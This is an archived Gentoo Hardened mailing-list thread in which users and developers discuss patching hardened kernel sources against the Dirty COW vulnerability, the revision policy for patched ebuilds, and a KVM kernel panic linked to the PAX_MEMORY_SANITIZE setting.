Advanced
Mailing List Archive

Mailing List Archive

  1. Home >
  2. Gentoo>
  3. Hardened
Re: hardened-sources-4.4.8-r1 mad COW patched?
klondike at gentoo
Oct 25, 2016, 7:10 AM
Post #1 of 13 (3496 views)
Permalink
El 25/10/16 a las 12:56, Miroslav Rovis escribió:
> Hi!
Hi Miroslav!
> Due to this bug:
> https://bugs.gentoo.org/show_bug.cgi?id=597554
>
> I can't use the patched 4.7.9 of hardened sources.
>
> hardened-sources-4.4.8-r1 do not appear to me to be mad COW patched.
I guess you are talking about CVE-2016–5195 here. Please correct me if
mistaken.
> I looked up the sources, but am not able to see for sure how to patch
> 4.4.8-r1 myself.
>
> I have just rsynced my system and nothing new seems to have happened
> with 4.4.8-r1 yet.
If 4.4.8 gets patched you will find a new revision (i.e. 4.4.8-r2). This
is quite standard Gentoo policy, if a package is modifed after
publication (for example by backporting patches) the revision of the
packet has to be increased so that users will be able to use these when
updating. The only exceptions I know of are the -9999 packages for
bleeding edge trunks and some very minor changes (think for example of a
fix in the build system or a minor documentation fix) which a fix for
CVE-2016–5195 clearly wouldn't be.

You can read more on the Gentoo project revision policy for ebuilds at
https://devmanual.gentoo.org/general-concepts/ebuild-revisions/
> Is thare patching needed for those stable hardened sources and will
> there be a patch soon?
According to
https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
CVE-2016-5195 has been around since 2.6.22 so 4.4.8-r1 is not patched
and is needed to protect against this issue, as for whether there will
or not be a backported patch you should ask blueness but my guess is
that there won't be one unless somebody provides such backported patch
to blueness.

I'm CCing the Gentoo Hardened user list as other users may be able to
provide more and better input on this.

Sincerely,
Francisco Blas Izquierdo Riera (klondike)

Attached Files:

Re: hardened-sources-4.4.8-r1 mad COW patched? [ In reply to ]
blueness at gentoo
Oct 25, 2016, 7:11 AM
Post #2 of 13 (3490 views)
Permalink
On 10/25/16 10:10 AM, Francisco Blas Izquierdo Riera (klondike) wrote:
> El 25/10/16 a las 12:56, Miroslav Rovis escribió:
>> Hi!
> Hi Miroslav!
>> Due to this bug:
>> https://bugs.gentoo.org/show_bug.cgi?id=597554
>>
>> I can't use the patched 4.7.9 of hardened sources.
>>
>> hardened-sources-4.4.8-r1 do not appear to me to be mad COW patched.
> I guess you are talking about CVE-2016–5195 here. Please correct me if
> mistaken.
>> I looked up the sources, but am not able to see for sure how to patch
>> 4.4.8-r1 myself.
>>
>> I have just rsynced my system and nothing new seems to have happened
>> with 4.4.8-r1 yet.
> If 4.4.8 gets patched you will find a new revision (i.e. 4.4.8-r2). This
> is quite standard Gentoo policy, if a package is modifed after
> publication (for example by backporting patches) the revision of the
> packet has to be increased so that users will be able to use these when
> updating. The only exceptions I know of are the -9999 packages for
> bleeding edge trunks and some very minor changes (think for example of a
> fix in the build system or a minor documentation fix) which a fix for
> CVE-2016–5195 clearly wouldn't be.
>
> You can read more on the Gentoo project revision policy for ebuilds at
> https://devmanual.gentoo.org/general-concepts/ebuild-revisions/
>> Is thare patching needed for those stable hardened sources and will
>> there be a patch soon?
> According to
> https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
> CVE-2016-5195 has been around since 2.6.22 so 4.4.8-r1 is not patched
> and is needed to protect against this issue, as for whether there will
> or not be a backported patch you should ask blueness but my guess is
> that there won't be one unless somebody provides such backported patch
> to blueness.
>
> I'm CCing the Gentoo Hardened user list as other users may be able to
> provide more and better input on this.
>
> Sincerely,
> Francisco Blas Izquierdo Riera (klondike)
>

I'm testing 4.7.10 and will have it stabilized soon.

--
Anthony G. Basile, Ph.D.
Gentoo Linux Developer [Hardened]
E-Mail : blueness@gentoo.org
GnuPG FP : 1FED FAD9 D82C 52A5 3BAB DC79 9384 FA6E F52D 4BBA
GnuPG ID : F52D4BBA
Re: Re: hardened-sources-4.4.8-r1 mad COW patched? [ In reply to ]
mjo at gentoo
Oct 25, 2016, 7:17 AM
Post #3 of 13 (3489 views)
Permalink
On 10/25/2016 10:11 AM, Anthony G. Basile wrote:
>
> I'm testing 4.7.10 and will have it stabilized soon.
>

FWIW, I've been panic-updating all of our x86/amd64 servers (mostly HP
Proliant) to 4.7.10 and nothing has blown up yet.
Re: hardened-sources-4.4.8-r1 mad COW patched? [ In reply to ]
miro.rovis at croatiafidelis
Oct 25, 2016, 8:24 AM
Post #4 of 13 (3489 views)
Permalink
(the first message I sent to hardened@gentoo.org but I meant to send to
the list, so resending)
On 161025-10:11-0400, Anthony G. Basile wrote:
> On 10/25/16 10:10 AM, Francisco Blas Izquierdo Riera (klondike) wrote:
> > El 25/10/16 a las 12:56, Miroslav Rovis escribió:
> >> Hi!
> > Hi Miroslav!
> >> Due to this bug:
> >> https://bugs.gentoo.org/show_bug.cgi?id=597554
> >>
> >> I can't use the patched 4.7.9 of hardened sources.
> >>
> >> hardened-sources-4.4.8-r1 do not appear to me to be mad COW patched.
> > I guess you are talking about CVE-2016–5195 here. Please correct me if
> > mistaken.
> >> I looked up the sources, but am not able to see for sure how to patch
> >> 4.4.8-r1 myself.
> >>
> >> I have just rsynced my system and nothing new seems to have happened
> >> with 4.4.8-r1 yet.
> > If 4.4.8 gets patched you will find a new revision (i.e. 4.4.8-r2). This
> > is quite standard Gentoo policy, if a package is modifed after
> > publication (for example by backporting patches) the revision of the
> > packet has to be increased so that users will be able to use these when
> > updating. The only exceptions I know of are the -9999 packages for
> > bleeding edge trunks and some very minor changes (think for example of a
> > fix in the build system or a minor documentation fix) which a fix for
> > CVE-2016–5195 clearly wouldn't be.
> >
> > You can read more on the Gentoo project revision policy for ebuilds at
> > https://devmanual.gentoo.org/general-concepts/ebuild-revisions/
> >> Is thare patching needed for those stable hardened sources and will
> >> there be a patch soon?
> > According to
> > https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
> > CVE-2016-5195 has been around since 2.6.22 so 4.4.8-r1 is not patched
> > and is needed to protect against this issue, as for whether there will
> > or not be a backported patch you should ask blueness but my guess is
> > that there won't be one unless somebody provides such backported patch
> > to blueness.
> >
> > I'm CCing the Gentoo Hardened user list as other users may be able to
> > provide more and better input on this.
> >
> > Sincerely,
> > Francisco Blas Izquierdo Riera (klondike)
> >
>
> I'm testing 4.7.10 and will have it stabilized soon.
>
> --
> Anthony G. Basile, Ph.D.
> Gentoo Linux Developer [Hardened]
> E-Mail : blueness@gentoo.org
> GnuPG FP : 1FED FAD9 D82C 52A5 3BAB DC79 9384 FA6E F52D 4BBA
> GnuPG ID : F52D4BBA

Professor Basile,

it's always a privilege reading from you, but do you mean the bug:
> >> https://bugs.gentoo.org/show_bug.cgi?id=597554
will be fixed too?

Regards!
--
Miroslav Rovis
Zagreb, Croatia
http://www.CroatiaFidelis.hr

Attached Files:

Re: hardened-sources-4.4.8-r1 mad COW patched? [ In reply to ]
miro.rovis at croatiafidelis
Oct 25, 2016, 9:24 AM
Post #5 of 13 (3491 views)
Permalink
Hi Francisco, and Michael!

On 161025-16:10+0200, Francisco Blas Izquierdo Riera (klondike) wrote:
> El 25/10/16 a las 12:56, Miroslav Rovis escribió:
> > Hi!
> Hi Miroslav!
> > Due to this bug:
> > https://bugs.gentoo.org/show_bug.cgi?id=597554
> >
> > I can't use the patched 4.7.9 of hardened sources.
> >
> > hardened-sources-4.4.8-r1 do not appear to me to be mad COW patched.
> I guess you are talking about CVE-2016–5195 here. Please correct me if
> mistaken.
Not likely. Prefer not to go checking it but mad [C]opy [O]n [W]rite has
acquired enough notoriety by now.
> > I looked up the sources, but am not able to see for sure how to patch
> > 4.4.8-r1 myself.
> >
> > I have just rsynced my system and nothing new seems to have happened
> > with 4.4.8-r1 yet.
> If 4.4.8 gets patched you will find a new revision (i.e. 4.4.8-r2).
> ...
I know that more or less well.
>
> You can read more on the Gentoo project revision policy for ebuilds at
> https://devmanual.gentoo.org/general-concepts/ebuild-revisions/
Awaiting for me. Gone through it to some extent once, but I'm too slow
to figure much so well very soon... I'm nearly 60 yrs old and started
with computing after I was 40...
>
> I'm CCing the Gentoo Hardened user list as other users may be able to
> provide more and better input on this.
Which is great, since I now subscribed.
>
> Sincerely,
> Francisco Blas Izquierdo Riera (klondike)
Thanks, Francisco!

The other correspondent in this thread, Michael Orlitzky, mentioned how
4.7.10 already works fine for him.

I'll paste and ask him here:

> > I'm testing 4.7.10 and will have it stabilized soon.
> >
>
> FWIW, I've been panic-updating all of our x86/amd64 servers (mostly HP
> Proliant) to 4.7.10 and nothing has blown up yet.

Michael,

are you talking about that bug:

=sys-kernel/hardened-sources-4.7.6: Kernel panic when starting KVM
guests
> > https://bugs.gentoo.org/show_bug.cgi?id=597554
having been fixed in 4.7.10

Where are the hardened-sources?
I tried:
https://gitweb.gentoo.org/proj/hardened-kernel.git/
and see only very old stuff there.
I tried:
https://gitweb.gentoo.org/dev/blueness.git/
but can't find how to (maybe) get 4.7.10.

(And I also couldn't find them on Github a few days ago. And alos
currently don't have the time to study Gentoo git system more deeply.)

Regards!
--
Miroslav Rovis
Zagreb, Croatia
http://www.CroatiaFidelis.hr

Attached Files:

Re: hardened-sources-4.4.8-r1 mad COW patched? [ In reply to ]
miro.rovis at croatiafidelis
Oct 25, 2016, 10:06 AM
Post #6 of 13 (3490 views)
Permalink
On 161025-17:24+0200, Miroslav Rovis wrote:
> (the first message I sent to hardened@gentoo.org but I meant to send to
> the list, so resending)
Due to my above mess-up, blueness reply didn't get to the list, but I'll
manually forward the reply that I got, further below.

> On 161025-10:11-0400, Anthony G. Basile wrote:
> > On 10/25/16 10:10 AM, Francisco Blas Izquierdo Riera (klondike) wrote:
> > > El 25/10/16 a las 12:56, Miroslav Rovis escribió:
> > >> Hi!
> > > Hi Miroslav!
> > >> Due to this bug:
> > >> https://bugs.gentoo.org/show_bug.cgi?id=597554
> > >>
> > >> I can't use the patched 4.7.9 of hardened sources.
>
> Professor Basile,
>
> it's always a privilege reading from you, but do you mean the bug:
> > >> https://bugs.gentoo.org/show_bug.cgi?id=597554
> will be fixed too?

(blueness replied to me:)

i don't know, but even if the bug carries over, we still need to move
foward on this.
---
Thanks, Professor Basile!

And the need to move forware I, of course, I understand. But 4.4.8-r1
has the mad COW, and the 4.7.10 will probably have that bug carried
over...

I spent almost two days testing for that bug, and should be off, and
will be off with other business... But I too use my machines daily, and
I don't have a reliable system now...

Oh well, it happens, what can you... Maybe I'll somehow survive ;-)

--
Miroslav Rovis
Zagreb, Croatia
http://www.CroatiaFidelis.hr

Attached Files:

Re: Re: hardened-sources-4.4.8-r1 mad COW patched? [ In reply to ]
wabenbau at gmail
Oct 25, 2016, 10:35 AM
Post #7 of 13 (3490 views)
Permalink
Am Dienstag, 25.10.2016 um 18:24
schrieb Miroslav Rovis <miro.rovis@croatiafidelis.hr>:

> The other correspondent in this thread, Michael Orlitzky, mentioned
> how 4.7.10 already works fine for him.
>
> I'll paste and ask him here:
>
> > > I'm testing 4.7.10 and will have it stabilized soon.
> > >
> >
> > FWIW, I've been panic-updating all of our x86/amd64 servers (mostly
> > HP Proliant) to 4.7.10 and nothing has blown up yet.
>
> Michael,
>
> are you talking about that bug:
>
> =sys-kernel/hardened-sources-4.7.6: Kernel panic when starting KVM
> guests
> > > https://bugs.gentoo.org/show_bug.cgi?id=597554
> having been fixed in 4.7.10

Interesting. I'm using hardened-sources-4.7.6 and qemu-2.7.0-r4 and
don't have any problems so far. I'm using qemu VMs with xubuntu
14.04 and 16.04.

--
Regards
wabe
Re: Re: hardened-sources-4.4.8-r1 mad COW patched? [ In reply to ]
miro.rovis at croatiafidelis
Oct 25, 2016, 11:17 AM
Post #8 of 13 (3490 views)
Permalink
On 161025-19:35+0200, wabe wrote:
> Am Dienstag, 25.10.2016 um 18:24
> schrieb Miroslav Rovis <miro.rovis@croatiafidelis.hr>:
>
> > The other correspondent in this thread, Michael Orlitzky, mentioned
> > how 4.7.10 already works fine for him.
> >
> > I'll paste and ask him here:
> >
> > > > I'm testing 4.7.10 and will have it stabilized soon.
> > > >
> > >
> > > FWIW, I've been panic-updating all of our x86/amd64 servers (mostly
> > > HP Proliant) to 4.7.10 and nothing has blown up yet.
> >
> > Michael,
> >
> > are you talking about that bug:
> >
> > =sys-kernel/hardened-sources-4.7.6: Kernel panic when starting KVM
> > guests
> > > > https://bugs.gentoo.org/show_bug.cgi?id=597554
> > having been fixed in 4.7.10
>
> Interesting. I'm using hardened-sources-4.7.6 and qemu-2.7.0-r4 and
> don't have any problems so far. I'm using qemu VMs with xubuntu
> 14.04 and 16.04.
You mean your hardened-sources-4.7.6 are set up as grsecurity-hardened ?

Or are they maybe SELinux hardened ? Or AppArmor hardened ? Or other?
(really not familiar much with all the options in the hardened)

Regards!
--
Miroslav Rovis
Zagreb, Croatia
http://www.CroatiaFidelis.hr

Attached Files:

Re: Re: hardened-sources-4.4.8-r1 mad COW patched? [ In reply to ]
pageexec at freemail
Oct 25, 2016, 11:23 AM
Post #9 of 13 (3488 views)
Permalink
On 25 Oct 2016 at 19:35, wabe wrote:

> Interesting. I'm using hardened-sources-4.7.6 and qemu-2.7.0-r4 and
> don't have any problems so far. I'm using qemu VMs with xubuntu
> 14.04 and 16.04.

do you enable SANITIZE? 'cos that's what seems to trigger the problem for Miroslav.
Re: Re: hardened-sources-4.4.8-r1 mad COW patched? [ In reply to ]
wabenbau at gmail
Oct 25, 2016, 11:42 AM
Post #10 of 13 (3490 views)
Permalink
Am Dienstag, 25.10.2016 um 20:17
schrieb Miroslav Rovis <miro.rovis@croatiafidelis.hr>:

> On 161025-19:35+0200, wabe wrote:
> > Am Dienstag, 25.10.2016 um 18:24
> > schrieb Miroslav Rovis <miro.rovis@croatiafidelis.hr>:
> >
> > > The other correspondent in this thread, Michael Orlitzky,
> > > mentioned how 4.7.10 already works fine for him.
> > >
> > > I'll paste and ask him here:
> > >
> > > > > I'm testing 4.7.10 and will have it stabilized soon.
> > > > >
> > > >
> > > > FWIW, I've been panic-updating all of our x86/amd64 servers
> > > > (mostly HP Proliant) to 4.7.10 and nothing has blown up yet.
> > >
> > > Michael,
> > >
> > > are you talking about that bug:
> > >
> > > =sys-kernel/hardened-sources-4.7.6: Kernel panic when starting KVM
> > > guests
> > > > > https://bugs.gentoo.org/show_bug.cgi?id=597554
> > > having been fixed in 4.7.10
> >
> > Interesting. I'm using hardened-sources-4.7.6 and qemu-2.7.0-r4 and
> > don't have any problems so far. I'm using qemu VMs with xubuntu
> > 14.04 and 16.04.
> You mean your hardened-sources-4.7.6 are set up as
> grsecurity-hardened ?
>
> Or are they maybe SELinux hardened ? Or AppArmor hardened ? Or other?
> (really not familiar much with all the options in the hardened)

I'm using grsecurity but I don't have PAX_MEMORY_SANITIZE enabled.
According to PaX Teams reply to my last message this is the reason why
I don't have problems with qemu.

--
Regards
wabe
Re: Re: hardened-sources-4.4.8-r1 mad COW patched? [ In reply to ]
wabenbau at gmail
Oct 25, 2016, 11:46 AM
Post #11 of 13 (3490 views)
Permalink
Am Dienstag, 25.10.2016 um 20:23
schrieb "PaX Team" <pageexec@freemail.hu>:

> On 25 Oct 2016 at 19:35, wabe wrote:
>
> > Interesting. I'm using hardened-sources-4.7.6 and qemu-2.7.0-r4 and
> > don't have any problems so far. I'm using qemu VMs with xubuntu
> > 14.04 and 16.04.
>
> do you enable SANITIZE? 'cos that's what seems to trigger the problem
> for Miroslav.

I don't have this feature enabled because of a possible performance
impact. My system is already slow enough. ;-)

Symbol: PAX_MEMORY_SANITIZE [=n]
Type : boolean
Prompt: Sanitize all freed memory
Location:
-> Security options
-> Grsecurity
-> Grsecurity (GRKERNSEC [=y])
-> Customize Configuration
-> PaX
-> Miscellaneous hardening features

--
Regards
wabe
Re: Re: hardened-sources-4.4.8-r1 mad COW patched? [ In reply to ]
miro.rovis at croatiafidelis
Oct 25, 2016, 12:15 PM
Post #12 of 13 (3490 views)
Permalink
( wabe I also read your reply )

On 161025-20:23+0200, PaX Team wrote:
> On 25 Oct 2016 at 19:35, wabe wrote:
>
> > Interesting. I'm using hardened-sources-4.7.6 and qemu-2.7.0-r4 and
> > don't have any problems so far. I'm using qemu VMs with xubuntu
> > 14.04 and 16.04.
>
> do you enable SANITIZE? 'cos that's what seems to trigger the problem for Miroslav.
>
Nope! Or not completely true.

https://bugs.gentoo.org/show_bug.cgi?id=597554#c56
where find:

"which means, with SANITIZE: crash, w/o SANITIZE: no work..."

And also my recall in the next comment, the c57 of how previously even
the SANITIZE-disabled kernel crashed.

Wish I could dedicate more time to that testing now... Unfortunately,
no straight dedicated long enough time to work on that available here
for one or two more days...

Binary search should be in order...

And your reply in that bug, to how that different behavior of those
kernel, for non-experts would be great... (the "ioctl(KVM_CREATE_VM)
failed: 12 Cannot allocate memory"... by SANITIZE-disabled kernel...

Of course, if you can find that time... (esp. since I can not find much
time now for a while)...

Regards!
--
Miroslav Rovis
Zagreb, Croatia
http://www.CroatiaFidelis.hr

Attached Files:

Re: Re: hardened-sources-4.4.8-r1 mad COW patched? [ In reply to ]
miro.rovis at croatiafidelis
Oct 25, 2016, 6:48 PM
Post #13 of 13 (3489 views)
Permalink
On 161025-19:06+0200, Miroslav Rovis wrote:
> On 161025-17:24+0200, Miroslav Rovis wrote:
...
> > > On 10/25/16 10:10 AM, Francisco Blas Izquierdo Riera (klondike) wrote:
> > > > El 25/10/16 a las 12:56, Miroslav Rovis escribió:
...
>
> And the need to move forware I, of course, I understand. But 4.4.8-r1
> has the mad COW, and the 4.7.10 will probably have that bug carried
> over...
>
> I spent almost two days testing for that bug, and should be off, and
> will be off with other business... But I too use my machines daily, and
> I don't have a reliable system now...
...

The 4.4.8-r1 can be patched just like any other kernel!

Developer Fernando Rodriguez has been kind to tollerate my obstinate
misunderstanding of his tip, and taught me how to do it:

[gentoo-user] Dirty COW, 4.4.8-hardened-r1 how to fix?
https://archives.gentoo.org/gentoo-user/message/be9665d005ad02d1826610571d0c7d5d

So it is likely just, now after patching it, I only need to:

# make && make install && make modules_install &

Regards!
--
Miroslav Rovis
Zagreb, Croatia
http://www.CroatiaFidelis.hr

Attached Files:

©2024 GT.net. A Gossamer Threads company.
5th Floor, 455 Granville St., Vancouver, BC V6C 1T1, Canada | Legal